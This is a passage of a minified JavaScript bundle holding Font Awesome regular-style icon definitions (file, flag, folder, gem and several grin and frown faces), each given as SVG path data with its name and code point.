21.5-48 48s21.5 48 48 48 48-21.5 48-48-21.5-48-48-48z"]},faFilePdf:{prefix:"far",iconName:"file-pdf",icon:[384,512,[],"f1c1","M369.9 97.9L286 14C277 5 264.8-.1 252.1-.1H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V131.9c0-12.7-5.1-25-14.1-34zM332.1 128H256V51.9l76.1 76.1zM48 464V48h160v104c0 13.3 10.7 24 24 24h104v288H48zm250.2-143.7c-12.2-12-47-8.7-64.4-6.5-17.2-10.5-28.7-25-36.8-46.3 3.9-16.1 10.1-40.6 5.4-56-4.2-26.2-37.8-23.6-42.6-5.9-4.4 16.1-.4 38.5 7 67.1-10 23.9-24.9 56-35.4 74.4-20 10.3-47 26.2-51 46.2-3.3 15.8 26 55.2 76.1-31.2 22.4-7.4 46.8-16.5 68.4-20.1 18.9 10.2 41 17 55.8 17 25.5 0 28-28.2 17.5-38.7zm-198.1 77.8c5.1-13.7 24.5-29.5 30.4-35-19 30.3-30.4 35.7-30.4 35zm81.6-190.6c7.4 0 6.7 32.1 1.8 40.8-4.4-13.9-4.3-40.8-1.8-40.8zm-24.4 136.6c9.7-16.9 18-37 24.7-54.7 8.3 15.1 18.9 27.2 30.1 35.5-20.8 4.3-38.9 13.1-54.8 19.2zm131.6-5s-5 6-37.3-7.8c35.1-2.6 40.9 5.4 37.3 7.8z"]},faFilePowerpoint:{prefix:"far",iconName:"file-powerpoint",icon:[384,512,[],"f1c4","M369.9 97.9L286 14C277 5 264.8-.1 252.1-.1H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V131.9c0-12.7-5.1-25-14.1-34zM332.1 128H256V51.9l76.1 76.1zM48 464V48h160v104c0 13.3 10.7 24 24 24h104v288H48zm72-60V236c0-6.6 5.4-12 12-12h69.2c36.7 0 62.8 27 62.8 66.3 0 74.3-68.7 66.5-95.5 66.5V404c0 6.6-5.4 12-12 12H132c-6.6 0-12-5.4-12-12zm48.5-87.4h23c7.9 0 13.9-2.4 18.1-7.2 8.5-9.8 8.4-28.5.1-37.8-4.1-4.6-9.9-7-17.4-7h-23.9v52z"]},faFileVideo:{prefix:"far",iconName:"file-video",icon:[384,512,[],"f1c8","M369.941 97.941l-83.882-83.882A48 48 0 0 0 252.118 0H48C21.49 0 0 21.49 0 48v416c0 26.51 21.49 48 48 48h288c26.51 0 48-21.49 48-48V131.882a48 48 0 0 0-14.059-33.941zM332.118 128H256V51.882L332.118 128zM48 464V48h160v104c0 13.255 10.745 24 24 24h104v288H48zm228.687-211.303L224 305.374V268c0-11.046-8.954-20-20-20H100c-11.046 0-20 8.954-20 20v104c0 11.046 8.954 20 20 20h104c11.046 0 20-8.954 20-20v-37.374l52.687 52.674C286.704 397.318 304 390.28 304 375.986V264.011c0-14.311-17.309-21.319-27.313-11.314z"]},faFileWord:{prefix:"far",iconName:"file-word",icon:[384,512,[],"f1c2","M369.9 97.9L286 14C277 5 264.8-.1 252.1-.1H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h288c26.5 0 48-21.5 48-48V131.9c0-12.7-5.1-25-14.1-34zM332.1 128H256V51.9l76.1 76.1zM48 464V48h160v104c0 13.3 10.7 24 24 24h104v288H48zm220.1-208c-5.7 0-10.6 4-11.7 9.5-20.6 97.7-20.4 95.4-21 103.5-.2-1.2-.4-2.6-.7-4.3-.8-5.1.3.2-23.6-99.5-1.3-5.4-6.1-9.2-11.7-9.2h-13.3c-5.5 0-10.3 3.8-11.7 9.1-24.4 99-24 96.2-24.8 103.7-.1-1.1-.2-2.5-.5-4.2-.7-5.2-14.1-73.3-19.1-99-1.1-5.6-6-9.7-11.8-9.7h-16.8c-7.8 0-13.5 7.3-11.7 14.8 8 32.6 26.7 109.5 33.2 136 1.3 5.4 6.1 9.1 11.7 9.1h25.2c5.5 0 10.3-3.7 11.6-9.1l17.9-71.4c1.5-6.2 2.5-12 3-17.3l2.9 17.3c.1.4 12.6 50.5 17.9 71.4 1.3 5.3 6.1 9.1 11.6 9.1h24.7c5.5 0 10.3-3.7 11.6-9.1 20.8-81.9 30.2-119 34.5-136 1.9-7.6-3.8-14.9-11.6-14.9h-15.8z"]},faFlag:{prefix:"far",iconName:"flag",icon:[512,512,[],"f024","M336.174 80c-49.132 0-93.305-32-161.913-32-31.301 0-58.303 6.482-80.721 15.168a48.04 48.04 0 0 0 2.142-20.727C93.067 19.575 74.167 1.594 51.201.104 23.242-1.71 0 20.431 0 48c0 17.764 9.657 33.262 24 41.562V496c0 8.837 7.163 16 16 16h16c8.837 0 16-7.163 16-16v-83.443C109.869 395.28 143.259 384 199.826 384c49.132 0 93.305 32 161.913 32 58.479 0 101.972-22.617 128.548-39.981C503.846 367.161 512 352.051 512 335.855V95.937c0-34.459-35.264-57.768-66.904-44.117C409.193 67.309 371.641 80 336.174 80zM464 336c-21.783 15.412-60.824 32-102.261 32-59.945 0-102.002-32-161.913-32-43.361 0-96.379 9.403-127.826 24V128c21.784-15.412 60.824-32 102.261-32 59.945 0 102.002 32 161.913 32 43.271 0 96.32-17.366 127.826-32v240z"]},faFlushed:{prefix:"far",iconName:"flushed",icon:[496,512,[],"f579","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm96-312c-44.2 0-80 35.8-80 80s35.8 80 80 80 80-35.8 80-80-35.8-80-80-80zm0 128c-26.5 0-48-21.5-48-48s21.5-48 48-48 48 21.5 48 48-21.5 48-48 48zm0-72c-13.3 0-24 10.7-24 24s10.7 24 24 24 24-10.7 24-24-10.7-24-24-24zm-112 24c0-44.2-35.8-80-80-80s-80 35.8-80 80 35.8 80 80 80 80-35.8 80-80zm-80 48c-26.5 0-48-21.5-48-48s21.5-48 48-48 48 21.5 48 48-21.5 48-48 48zm0-72c-13.3 0-24 10.7-24 24s10.7 24 24 24 24-10.7 24-24-10.7-24-24-24zm160 144H184c-13.2 0-24 10.8-24 24s10.8 24 24 24h128c13.2 0 24-10.8 24-24s-10.8-24-24-24z"]},faFolder:{prefix:"far",iconName:"folder",icon:[512,512,[],"f07b","M464 128H272l-54.63-54.63c-6-6-14.14-9.37-22.63-9.37H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V176c0-26.51-21.49-48-48-48zm0 272H48V112h140.12l54.63 54.63c6 6 14.14 9.37 22.63 9.37H464v224z"]},faFolderOpen:{prefix:"far",iconName:"folder-open",icon:[576,512,[],"f07c","M527.9 224H480v-48c0-26.5-21.5-48-48-48H272l-64-64H48C21.5 64 0 85.5 0 112v288c0 26.5 21.5 48 48 48h400c16.5 0 31.9-8.5 40.7-22.6l79.9-128c20-31.9-3-73.4-40.7-73.4zM48 118c0-3.3 2.7-6 6-6h134.1l64 64H426c3.3 0 6 2.7 6 6v42H152c-16.8 0-32.4 8.8-41.1 23.2L48 351.4zm400 282H72l77.2-128H528z"]},faFontAwesomeLogoFull:{prefix:"far",iconName:"font-awesome-logo-full",icon:[3992,512,["Font Awesome"],"f4e6","M454.6 0H57.4C25.9 0 0 25.9 0 57.4v397.3C0 486.1 25.9 512 57.4 512h397.3c31.4 0 57.4-25.9 57.4-57.4V57.4C512 25.9 486.1 0 454.6 0zm-58.9 324.9c0 4.8-4.1 6.9-8.9 8.9-19.2 8.1-39.7 15.7-61.5 15.7-40.5 0-68.7-44.8-163.2 2.5v51.8c0 30.3-45.7 30.2-45.7 0v-250c-9-7-15-17.9-15-30.3 0-21 17.1-38.2 38.2-38.2 21 0 38.2 17.1 38.2 38.2 0 12.2-5.8 23.2-14.9 30.2v21c37.1-12 65.5-34.4 146.1-3.4 26.6 11.4 68.7-15.7 76.5-15.7 5.5 0 10.3 4.1 10.3 8.9v160.4zm432.9-174.2h-137v70.1H825c39.8 0 40.4 62.2 0 62.2H691.6v105.6c0 45.5-70.7 46.4-70.7 0V128.3c0-22 18-39.8 39.8-39.8h167.8c39.6 0 40.5 62.2.1 62.2zm191.1 23.4c-169.3 0-169.1 252.4 0 252.4 169.9 0 169.9-252.4 0-252.4zm0 196.1c-81.6 0-82.1-139.8 0-139.8 82.5 0 82.4 139.8 0 139.8zm372.4 53.4c-17.5 0-31.4-13.9-31.4-31.4v-117c0-62.4-72.6-52.5-99.1-16.4v133.4c0 41.5-63.3 41.8-63.3 0V208c0-40 63.1-41.6 63.1 0v3.4c43.3-51.6 162.4-60.4 162.4 39.3v141.5c.3 30.4-31.5 31.4-31.7 31.4zm179.7 2.9c-44.3 0-68.3-22.9-68.3-65.8V235.2H1488c-35.6 0-36.7-55.3 0-55.3h15.5v-37.3c0-41.3 63.8-42.1 63.8 0v37.5h24.9c35.4 0 35.7 55.3 0 55.3h-24.9v108.5c0 29.6 26.1 26.3 27.4 26.3 31.4 0 52.6 56.3-22.9 56.3zM1992 123c-19.5-50.2-95.5-50-114.5 0-107.3 275.7-99.5 252.7-99.5 262.8 0 42.8 58.3 51.2 72.1 14.4l13.5-35.9H2006l13 35.9c14.2 37.7 72.1 27.2 72.1-14.4 0-10.1 5.3 6.8-99.1-262.8zm-108.9 179.1l51.7-142.9 51.8 142.9h-103.5zm591.3-85.6l-53.7 176.3c-12.4 41.2-72 41-84 0l-42.3-135.9-42.3 135.9c-12.4 40.9-72 41.2-84.5 0l-54.2-176.3c-12.5-39.4 49.8-56.1 60.2-16.9L2213 342l45.3-139.5c10.9-32.7 59.6-34.7 71.2 0l45.3 139.5 39.3-142.4c10.3-38.3 72.6-23.8 60.3 16.9zm275.4 75.1c0-42.4-33.9-117.5-119.5-117.5-73.2 0-124.4 56.3-124.4 126 0 77.2 55.3 126.4 128.5 126.4 31.7 0 93-11.5 93-39.8 0-18.3-21.1-31.5-39.3-22.4-49.4 26.2-109 8.4-115.9-43.8h148.3c16.3 0 29.3-13.4 29.3-28.9zM2571 277.7c9.5-73.4 113.9-68.6 118.6 0H2571zm316.7 148.8c-31.4 0-81.6-10.5-96.6-31.9-12.4-17 2.5-39.8 21.8-39.8 16.3 0 36.8 22.9 77.7 22.9 27.4 0 40.4-11 40.4-25.8 0-39.8-142.9-7.4-142.9-102 0-40.4 35.3-75.7 98.6-75.7 31.4 0 74.1 9.9 87.6 29.4 10.8 14.8-1.4 36.2-20.9 36.2-15.1 0-26.7-17.3-66.2-17.3-22.9 0-37.8 10.5-37.8 23.8 0 35.9 142.4 6 142.4 103.1-.1 43.7-37.4 77.1-104.1 77.1zm266.8-252.4c-169.3 0-169.1 252.4 0 252.4 170.1 0 169.6-252.4 0-252.4zm0 196.1c-81.8 0-82-139.8 0-139.8 82.5 0 82.4 139.8 0 139.8zm476.9 22V268.7c0-53.8-61.4-45.8-85.7-10.5v134c0 41.3-63.8 42.1-63.8 0V268.7c0-52.1-59.5-47.4-85.7-10.1v133.6c0 41.5-63.3 41.8-63.3 0V208c0-40 63.1-41.6 63.1 0v3.4c9.9-14.4 41.8-37.3 78.6-37.3 35.3 0 57.7 16.4 66.7 43.8 13.9-21.8 45.8-43.8 82.6-43.8 44.3 0 70.7 23.4 70.7 72.7v145.3c.5 17.3-13.5 31.4-31.9 31.4 3.5.1-31.3 1.1-31.3-31.3zM3992 291.6c0-42.4-32.4-117.5-117.9-117.5-73.2 0-127.5 56.3-127.5 126 0 77.2 58.3 126.4 131.6 126.4 31.7 0 91.5-11.5 91.5-39.8 0-18.3-21.1-31.5-39.3-22.4-49.4 26.2-110.5 8.4-117.5-43.8h149.8c16.3 0 29.1-13.4 29.3-28.9zm-180.5-13.9c9.7-74.4 115.9-68.3 120.1 0h-120.1z"]},faFrown:{prefix:"far",iconName:"frown",icon:[496,512,[],"f119","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm-80-216c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm160-64c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm-80 128c-40.2 0-78 17.7-103.8 48.6-8.5 10.2-7.1 25.3 3.1 33.8 10.2 8.4 25.3 7.1 33.8-3.1 16.6-19.9 41-31.4 66.9-31.4s50.3 11.4 66.9 31.4c8.1 9.7 23.1 11.9 33.8 3.1 10.2-8.5 11.5-23.6 3.1-33.8C326 321.7 288.2 304 248 304z"]},faFrownOpen:{prefix:"far",iconName:"frown-open",icon:[496,512,[],"f57a","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm-48-248c0-17.7-14.3-32-32-32s-32 14.3-32 32 14.3 32 32 32 32-14.3 32-32zm128-32c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zm-80 112c-35.6 0-88.8 21.3-95.8 61.2-2 11.8 9 21.5 20.5 18.1 31.2-9.6 59.4-15.3 75.3-15.3s44.1 5.7 75.3 15.3c11.4 3.5 22.5-6.3 20.5-18.1-7-39.9-60.2-61.2-95.8-61.2z"]},faFutbol:{prefix:"far",iconName:"futbol",icon:[496,512,[],"f1e3","M483.8 179.4C449.8 74.6 352.6 8 248.1 8c-25.4 0-51.2 3.9-76.7 12.2C41.2 62.5-30.1 202.4 12.2 332.6 46.2 437.4 143.4 504 247.9 504c25.4 0 51.2-3.9 76.7-12.2 130.2-42.3 201.5-182.2 159.2-312.4zm-74.5 193.7l-52.2 6.4-43.7-60.9 24.4-75.2 71.1-22.1 38.9 36.4c-.2 30.7-7.4 61.1-21.7 89.2-4.7 9.3-10.7 17.8-16.8 26.2zm0-235.4l-10.4 53.1-70.7 22-64.2-46.5V92.5l47.4-26.2c39.2 13 73.4 38 97.9 71.4zM184.9 66.4L232 92.5v73.8l-64.2 46.5-70.6-22-10.1-52.5c24.3-33.4 57.9-58.6 97.8-71.9zM139 379.5L85.9 373c-14.4-20.1-37.3-59.6-37.8-115.3l39-36.4 71.1 22.2 24.3 74.3-43.5 61.7zm48.2 67l-22.4-48.1 43.6-61.7H287l44.3 61.7-22.4 48.1c-6.2 1.8-57.6 20.4-121.7 0z"]},faGem:{prefix:"far",iconName:"gem",icon:[576,512,[],"f3a5","M464 0H112c-4 0-7.8 2-10 5.4L2 152.6c-2.9 4.4-2.6 10.2.7 14.2l276 340.8c4.8 5.9 13.8 5.9 18.6 0l276-340.8c3.3-4.1 3.6-9.8.7-14.2L474.1 5.4C471.8 2 468.1 0 464 0zm-19.3 48l63.3 96h-68.4l-51.7-96h56.8zm-202.1 0h90.7l51.7 96H191l51.6-96zm-111.3 0h56.8l-51.7 96H68l63.3-96zm-43 144h51.4L208 352 88.3 192zm102.9 0h193.6L288 435.3 191.2 192zM368 352l68.2-160h51.4L368 352z"]},faGrimace:{prefix:"far",iconName:"grimace",icon:[496,512,[],"f57f","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm-80-216c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm160 0c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm16 16H152c-26.5 0-48 21.5-48 48v32c0 26.5 21.5 48 48 48h192c26.5 0 48-21.5 48-48v-32c0-26.5-21.5-48-48-48zm-168 96h-24c-8.8 0-16-7.2-16-16v-8h40v24zm0-40h-40v-8c0-8.8 7.2-16 16-16h24v24zm64 40h-48v-24h48v24zm0-40h-48v-24h48v24zm64 40h-48v-24h48v24zm0-40h-48v-24h48v24zm56 24c0 8.8-7.2 16-16 16h-24v-24h40v8zm0-24h-40v-24h24c8.8 0 16 7.2 16 16v8z"]},faGrin:{prefix:"far",iconName:"grin",icon:[496,512,[],"f580","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm105.6-151.4c-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.9-3.1-19.4 5.4-17.7 15.3 7.9 47.1 71.3 80 123.3 80s115.3-32.9 123.3-80c1.6-9.8-7.7-18.4-17.7-15.3zM168 240c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm160 0c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32z"]},faGrinAlt:{prefix:"far",iconName:"grin-alt",icon:[496,512,[],"f581","M200.3 248c12.4-18.7 15.1-37.3 15.7-56-.5-18.7-3.3-37.3-15.7-56-8-12-25.1-11.4-32.7 0-12.4 18.7-15.1 37.3-15.7 56 .5 18.7 3.3 37.3 15.7 56 8.1 12 25.2 11.4 32.7 0zm128 0c12.4-18.7 15.1-37.3 15.7-56-.5-18.7-3.3-37.3-15.7-56-8-12-25.1-11.4-32.7 0-12.4 18.7-15.1 37.3-15.7 56 .5 18.7 3.3 37.3 15.7 56 8.1 12 25.2 11.4 32.7 0zM248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm105.6-151.4c-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.9-3.1-19.4 5.3-17.7 15.3 7.9 47.2 71.3 80 123.3 80s115.3-32.9 123.3-80c1.6-9.8-7.7-18.4-17.7-15.3z"]},faGrinBeam:{prefix:"far",iconName:"grin-beam",icon:[496,512,[],"f582","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm105.6-151.4c-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.8-3.1-19.4 5.3-17.7 15.3 7.9 47.1 71.3 80 123.3 80s115.3-32.9 123.3-80c1.6-9.8-7.7-18.4-17.7-15.3zm-235.9-72.9c3.5 1.1 7.4-.5 9.3-3.7l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c2.1 3.7 6.2 4.7 9.3 3.7 3.6-1.1 6-4.5 5.7-8.3-3.3-42.1-32.2-71.4-56-71.4s-52.7 29.3-56 71.4c-.3 3.7 2.1 7.2 5.7 8.3zm160 0c3.5 1.1 7.4-.5 9.3-3.7l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c2.1 3.7 6.2 4.7 9.3 3.7 3.6-1.1 6-4.5 5.7-8.3-3.3-42.1-32.2-71.4-56-71.4s-52.7 29.3-56 71.4c-.3 3.7 2.1 7.2 5.7 8.3z"]},faGrinBeamSweat:{prefix:"far",iconName:"grin-beam-sweat",icon:[496,512,[],"f583","M440 160c29.5 0 53.3-26.3 53.3-58.7 0-25-31.7-75.5-46.2-97.3-3.6-5.3-10.7-5.3-14.2 0-14.5 21.8-46.2 72.3-46.2 97.3 0 32.4 23.8 58.7 53.3 58.7zM248 400c51.9 0 115.3-32.9 123.3-80 1.7-9.9-7.7-18.5-17.7-15.3-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.8-3.1-19.4 5.3-17.7 15.3 8 47.1 71.4 80 123.3 80zm130.3-168.3c3.6-1.1 6-4.5 5.7-8.3-3.3-42.1-32.2-71.4-56-71.4s-52.7 29.3-56 71.4c-.3 3.7 2.1 7.2 5.7 8.3 3.5 1.1 7.4-.5 9.3-3.7l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c2.1 3.6 6.2 4.6 9.3 3.7zm105.3-52.9c-24.6 15.7-46 12.9-46.4 12.9 6.9 20.2 10.8 41.8 10.8 64.3 0 110.3-89.7 200-200 200S48 366.3 48 256 137.7 56 248 56c39.8 0 76.8 11.8 108 31.9 1.7-9.5 6.3-24.1 17.2-45.7C336.4 20.6 293.7 8 248 8 111 8 0 119 0 256s111 248 248 248 248-111 248-248c0-27-4.4-52.9-12.4-77.2zM168 189.4c12.3 0 23.8 7.9 31.5 21.6l9.5 17c2.1 3.7 6.2 4.7 9.3 3.7 3.6-1.1 6-4.5 5.7-8.3-3.3-42.1-32.2-71.4-56-71.4s-52.7 29.3-56 71.4c-.3 3.7 2.1 7.2 5.7 8.3 3.5 1.1 7.4-.5 9.3-3.7l9.5-17c7.7-13.8 19.2-21.6 31.5-21.6z"]},faGrinHearts:{prefix:"far",iconName:"grin-hearts",icon:[496,512,[],"f584","M353.6 304.6c-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.8-3.1-19.4 5.3-17.7 15.3 7.9 47.2 71.3 80 123.3 80s115.3-32.9 123.3-80c1.6-9.8-7.7-18.4-17.7-15.3zm-152.8-48.9c4.5 1.2 9.2-1.5 10.5-6l19.4-69.9c5.6-20.3-7.4-41.1-28.8-44.5-18.6-3-36.4 9.8-41.5 27.9l-2 7.1-7.1-1.9c-18.2-4.7-38.2 4.3-44.9 22-7.7 20.2 3.8 41.9 24.2 47.2l70.2 18.1zm188.8-65.3c-6.7-17.6-26.7-26.7-44.9-22l-7.1 1.9-2-7.1c-5-18.1-22.8-30.9-41.5-27.9-21.4 3.4-34.4 24.2-28.8 44.5l19.4 69.9c1.2 4.5 5.9 7.2 10.5 6l70.2-18.2c20.4-5.3 31.9-26.9 24.2-47.1zM248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200z"]},faGrinSquint:{prefix:"far",iconName:"grin-squint",icon:[496,512,[],"f585","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm105.6-151.4c-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.9-3.1-19.4 5.4-17.7 15.3 7.9 47.1 71.3 80 123.3 80s115.3-32.9 123.3-80c1.6-9.8-7.7-18.4-17.7-15.3zm-234.7-40.8c3.6 4.2 9.9 5.7 15.3 2.5l80-48c3.6-2.2 5.8-6.1 5.8-10.3s-2.2-8.1-5.8-10.3l-80-48c-5.1-3-11.4-1.9-15.3 2.5-3.8 4.5-3.8 11-.1 15.5l33.6 40.3-33.6 40.3c-3.8 4.5-3.7 11.1.1 15.5zm242.9 2.5c5.4 3.2 11.7 1.7 15.3-2.5 3.8-4.5 3.8-11 .1-15.5L343.6 208l33.6-40.3c3.8-4.5 3.7-11-.1-15.5-3.8-4.4-10.2-5.4-15.3-2.5l-80 48c-3.6 2.2-5.8 6.1-5.8 10.3s2.2 8.1 5.8 10.3l80 48z"]},faGrinSquintTears:{prefix:"far",iconName:"grin-squint-tears",icon:[512,512,[],"f586","M117.1 384.1c-25.8 3.7-84 13.7-100.9 30.6-21.9 21.9-21.5 57.9.9 80.3s58.3 22.8 80.3.9C114.3 479 124.3 420.8 128 395c.8-6.4-4.6-11.8-10.9-10.9zm-41.2-41.7C40.3 268 53 176.1 114.6 114.6 152.4 76.8 202.6 56 256 56c36.2 0 70.8 9.8 101.2 27.7 3.8-20.3 8-36.1 12-48.3C333.8 17.2 294.9 8 256 8 192.5 8 129.1 32.2 80.6 80.6c-74.1 74.1-91.3 183.4-52 274 12.2-4.1 27.7-8.3 47.3-12.2zm352.3-187.6c45 76.6 34.9 176.9-30.8 242.6-37.8 37.8-88 58.6-141.4 58.6-30.5 0-59.8-7-86.4-19.8-3.9 19.5-8 35-12.2 47.2 31.4 13.6 65 20.6 98.7 20.6 63.5 0 126.9-24.2 175.4-72.6 78.1-78.1 93.1-195.4 45.2-288.6-12.3 4-28.2 8.1-48.5 12zm-33.3-26.9c25.8-3.7 84-13.7 100.9-30.6 21.9-21.9 21.5-57.9-.9-80.3s-58.3-22.8-80.3-.9C397.7 33 387.7 91.2 384 117c-.8 6.4 4.6 11.8 10.9 10.9zm-187 108.3c-3-3-7.2-4.2-11.4-3.2L106 255.7c-5.7 1.4-9.5 6.7-9.1 12.6.5 5.8 5.1 10.5 10.9 11l52.3 4.8 4.8 52.3c.5 5.8 5.2 10.4 11 10.9h.9c5.5 0 10.3-3.7 11.7-9.1l22.6-90.5c1-4.2-.2-8.5-3.2-11.5zm39.7-25.1l90.5-22.6c5.7-1.4 9.5-6.7 9.1-12.6-.5-5.8-5.1-10.5-10.9-11l-52.3-4.8-4.8-52.3c-.5-5.8-5.2-10.4-11-10.9-5.6-.1-11.2 3.4-12.6 9.1L233 196.5c-1 4.1.2 8.4 3.2 11.4 5 5 11.3 3.2 11.4 3.2zm52 88.5c-29.1 29.1-59.7 52.9-83.9 65.4-9.2 4.8-10 17.5-1.7 23.4 38.9 27.7 107 6.2 143.7-30.6S416 253 388.3 214.1c-5.8-8.2-18.5-7.6-23.4 1.7-12.3 24.2-36.2 54.7-65.3 83.8z"]},faGrinStars:{prefix:"far",iconName:"grin-stars",icon:[496,512,[],"f587","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm105.6-151.4c-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.8-3.1-19.4 5.3-17.7 15.3 7.9 47.2 71.3 80 123.3 80s115.3-32.9 123.3-80c1.6-9.8-7.7-18.4-17.7-15.3zm-227.9-57.5c-1 6.2 5.4 11 11 7.9l31.3-16.3 31.3 16.3c5.6 3.1 12-1.7 11-7.9l-6-34.9 25.4-24.6c4.5-4.5 1.9-12.2-4.3-13.2l-34.9-5-15.5-31.6c-2.9-5.8-11-5.8-13.9 0l-15.5 31.6-34.9 5c-6.2.9-8.9 8.6-4.3 13.2l25.4 24.6-6.1 34.9zm259.7-72.7l-34.9-5-15.5-31.6c-2.9-5.8-11-5.8-13.9 0l-15.5 31.6-34.9 5c-6.2.9-8.9 8.6-4.3 13.2l25.4 24.6-6 34.9c-1 6.2 5.4 11 11 7.9l31.3-16.3 31.3 16.3c5.6 3.1 12-1.7 11-7.9l-6-34.9 25.4-24.6c4.5-4.6 1.8-12.2-4.4-13.2z"]},faGrinTears:{prefix:"far",iconName:"grin-tears",icon:[640,512,[],"f588","M117.1 256.1c-25.8 3.7-84 13.7-100.9 30.6-21.9 21.9-21.5 57.9.9 80.3s58.3 22.8 80.3.9C114.3 351 124.3 292.8 128 267c.8-6.4-4.6-11.8-10.9-10.9zm506.7 30.6c-16.9-16.9-75.1-26.9-100.9-30.6-6.3-.9-11.7 4.5-10.8 10.8 3.7 25.8 13.7 84 30.6 100.9 21.9 21.9 57.9 21.5 80.3-.9 22.3-22.3 22.7-58.3.8-80.2zm-126.6 61.7C463.8 412.3 396.9 456 320 456c-76.9 0-143.8-43.7-177.2-107.6-12.5 37.4-25.2 43.9-28.3 46.5C159.1 460.7 234.5 504 320 504s160.9-43.3 205.5-109.1c-3.2-2.7-15.9-9.2-28.3-46.5zM122.7 224.5C137.9 129.2 220.5 56 320 56c99.5 0 182.1 73.2 197.3 168.5 2.1-.2 5.2-2.4 49.5 7C554.4 106 448.7 8 320 8S85.6 106 73.2 231.4c44.5-9.4 47.1-7.2 49.5-6.9zM320 400c51.9 0 115.3-32.9 123.3-80 1.7-9.9-7.7-18.5-17.7-15.3-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.8-3.1-19.4 5.3-17.7 15.3 8 47.1 71.4 80 123.3 80zm130.3-168.3c3.6-1.1 6-4.5 5.7-8.3-3.3-42.1-32.2-71.4-56-71.4s-52.7 29.3-56 71.4c-.3 3.7 2.1 7.2 5.7 8.3 3.5 1.1 7.4-.5 9.3-3.7l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c2.1 3.6 6.2 4.6 9.3 3.7zM240 189.4c12.3 0 23.8 7.9 31.5 21.6l9.5 17c2.1 3.7 6.2 4.7 9.3 3.7 3.6-1.1 6-4.5 5.7-8.3-3.3-42.1-32.2-71.4-56-71.4s-52.7 29.3-56 71.4c-.3 3.7 2.1 7.2 5.7 8.3 3.5 1.1 7.4-.5 9.3-3.7l9.5-17c7.7-13.8 19.2-21.6 31.5-21.6z"]},faGrinTongue:{prefix:"far",iconName:"grin-tongue",icon:[496,512,[],"f589","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm64 400c0 35.6-29.1 64.5-64.9 64-35.1-.5-63.1-29.8-63.1-65v-42.8l17.7-8.8c15-7.5 31.5 1.7 34.9 16.5l2.8 12.1c2.1 9.2 15.2 9.2 17.3 0l2.8-12.1c3.4-14.8 19.8-24.1 34.9-16.5l17.7 8.8V408zm28.2 25.3c2.2-8.1 3.8-16.5 3.8-25.3v-43.5c14.2-12.4 24.4-27.5 27.3-44.5 1.7-9.9-7.7-18.5-17.7-15.3-25.9 8.3-64.4 13.1-105.6 13.1s-79.6-4.8-105.6-13.1c-9.9-3.1-19.4 5.3-17.7 15.3 2.9 17 13.1 32.1 27.3 44.5V408c0 8.8 1.6 17.2 3.8 25.3C91.8 399.9 48 333 48 256c0-110.3 89.7-200 200-200s200 89.7 200 200c0 77-43.8 143.9-107.8 